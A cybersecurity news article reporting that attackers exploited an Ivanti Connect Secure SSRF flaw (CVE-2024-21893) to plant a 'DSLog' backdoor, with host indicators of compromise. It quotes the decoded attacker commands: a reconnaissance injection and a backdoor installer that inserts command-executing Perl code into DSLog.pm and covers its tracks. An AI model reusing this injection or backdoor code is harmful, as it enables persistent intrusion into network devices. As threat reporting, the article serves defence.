Hackers Exploiting Ivanti SSRF flaw to Inject DSLog Malware

Ivanti Connect Secure was previously discovered with another SSRF vulnerability that could allow unauthenticated threat actors to access unrestricted resources due to a flaw in the SAML module. The vulnerability was assigned with CVE-2024-21893, and the severity was 8.2 (High). 

In addition, this vulnerability was previously reported to be exploited by threat actors in the wild during disclosure. However, recent reports indicate that threat actors have leveraged this vulnerability to install a previously unknown and exciting “DSLog backdoor” on vulnerable devices.

Orange Cyberdefense detected 670 compromised assets that attackers injected backdoor using a SAML vulnerability. This provided the attacker with persistent remote access.

Live Account Takeover Attack Simulation

How do Hackers Bypass 2FA?

Live attack simulation Webinar demonstrates various ways in which account takeover can happen and practices to protect your websites and APIs against ATO attacks .

Hackers Exploiting Ivanti SSRF Flaw

According to the reports, this vulnerability affects the embedded SAML module on Ivanti devices that threat actors exploit by injecting a backdoor with command injection. This backdoor was accessed and controlled with a basic “API Key” mechanism.

Initial request

During the initial phase of the attack, threat actors send an unauthenticated SAML authentication request that consists of an encoded command with “RetrievalMethod URI.” The request was identified to be a URL-encoded request containing a base64 encoded command alongside the URI.

Decoding the request for URL and base64 provides the following line of command used by threat actors for exploitation.;echo echo $(uname –
a;id)>/home/webserver/htdocs/dana-na/imgs/index2.txt| /usr/bin/base64 -d | /bin/bash;

This command gathers internal reconnaissance information and stores it into a file named “index2.txt” using the ‘echo’ command line tool. The encoded strings are also decoded using the base64 decode utility and bash command interpreter.

Backdoor Installation

Once the above command is executed successfully, the threat actors then attempt to install the backdoor on the vulnerable device using the same method of URL and Base64 encoding of commands. The request is as follows:;echo mount -o remount,rw /
if cat $DESTFILE | grep -q ‘HTTP_USER_AGENT’; then
echo ‘OK’;
sed -i ‘102i\\ my \$ua = \$\ENV{HTTP_USER_AGENT};\n my \$req =
\$\ENV{QUERY_STRING};\n my \$qur =
\”da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7\”;\n my @param =
split(/&/, \$req);\n if (index(\$ua, \$qur) != -1) {\n if (\$param[1]){\n my @res = split(/=/,
\$param[1]);\n if (\$res[0] eq \”cdi\”){\n \$res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex(\$1))/eg;\n
\$res[1] =~ tr/!-~/P-~!-O/;\n system(\${res[1]});\n }\n }\n }’ $DESTFILE
/bin/touch -r $CLFILE $DESTFILE
rm -rf /var/cores/*
/home/venv3/bin/python3 -c ‘import DSMonitor;DSMonitor.warmRestart()’| /usr/bin/base64 -d |
Decoded backdoor command (Source: Orange Cyber Defense)

This backdoor command is executed on the compromised device, and the backdoor is inserted into an existing Perl file named “DSLog.pm”. The DSLog is a module responsible for logging authenticated web requests and web requests and system logs on the device.

Orange Cyber Defense offers a comprehensive breakdown of the backdoor, command execution, methodologies, and other technical details for those with a strong technical background.

Indicators of Compromise

Host-based IoC

Path + filename Hash Description
/root/home/perl/DSLog[.]pmN/A – varies Legitimate DSLog Log module embedding the
/root/home/webserver/htdocs/danana/imgs/index[.]txtN/A – varies backdoor
/root/home/webserver/htdocs/danana/imgs/index1[.]txtN/A – varies Some seem to be random characters.
/root/home/webserver/htdocs/danana/imgs/index2[.]txtN/A – varies Some seem to be random characters.
/root/home/webserver/htdocs/danana/imgs/logo[.]pngEmbedding the result of ‘uname -a’

Network-based IoC

Network Indicator TypeDescription AddressMassive exploitation activity

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

Eswar is a Cyber security reporter with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is reporting data breach, Privacy and APT Threats.